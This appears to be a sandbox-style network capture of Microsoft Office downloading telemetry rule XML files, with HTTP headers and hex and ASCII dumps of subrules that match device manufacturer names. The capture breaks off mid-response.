                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:41 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 419
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                        x-ms-request-id: bd44ec9f-201e-003f-366e-496d94000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124941Z-r1cf579d778w7n65hC1EWR9b6800000000w0000000003uu0
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        29192.168.2.84975313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:42 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:43 UTC491INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:42 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 428
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                        x-ms-request-id: c358c675-901e-0029-1bb4-49274a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124942Z-r1cf579d778n9656hC1EWRqns000000000n0000000003zc1
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:43 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        30192.168.2.84975513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:43 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:43 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:43 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 415
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                        x-ms-request-id: 6d043e6b-a01e-0098-0dcd-498556000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124943Z-r1cf579d778l2x6lhC1EWRsptc00000001b0000000004a42
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:43 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        31192.168.2.84975413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:43 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:43 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:43 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 499
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                        x-ms-request-id: 90a12f2a-001e-0079-1603-4812e8000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124943Z-r1cf579d7788pwqzhC1EWRrpd800000008q0000000003yb7
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:43 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        32192.168.2.84975713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:43 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:43 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:43 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 419
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                        x-ms-request-id: 75599bc5-d01e-008e-7c03-48387a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124943Z-r1cf579d778z4wflhC1EWRa3h000000008a0000000008knb
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:43 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        33192.168.2.84975613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:43 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:43 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:43 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 471
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                        x-ms-request-id: 90f2e2a0-001e-0014-5807-485151000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124943Z-r1cf579d778qgtz2hC1EWRmgks0000000880000000003pp6
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:43 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        34192.168.2.84975813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:44 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:45 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:45 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 494
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                        x-ms-request-id: 48f2d82f-b01e-0084-1302-48d736000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124945Z-r1cf579d7788pwqzhC1EWRrpd800000008rg000000001te0
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:45 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        35192.168.2.84975913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:45 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:45 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:45 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 420
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                        x-ms-request-id: 1e88822f-901e-0029-0201-48274a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124945Z-r1cf579d778qlpkrhC1EWRpfc8000000093g000000003d8t
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:45 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        36192.168.2.84976213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:45 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:45 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:45 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 486
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                        x-ms-request-id: 549300b5-601e-000d-6903-482618000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124945Z-r1cf579d778qlpkrhC1EWRpfc800000008z0000000008s79
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:45 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        37192.168.2.84976113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:45 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:45 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:45 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 427
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                        x-ms-request-id: 22946cbe-b01e-0021-6403-48cab7000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124945Z-r1cf579d778x776bhC1EWRdk8000000008f0000000002em6
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        38192.168.2.84976013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:45 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:45 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:45 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 472
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                        x-ms-request-id: e333ec31-201e-003f-1d06-486d94000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124945Z-r1cf579d778lntp7hC1EWR9gg400000007xg000000001ckx
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
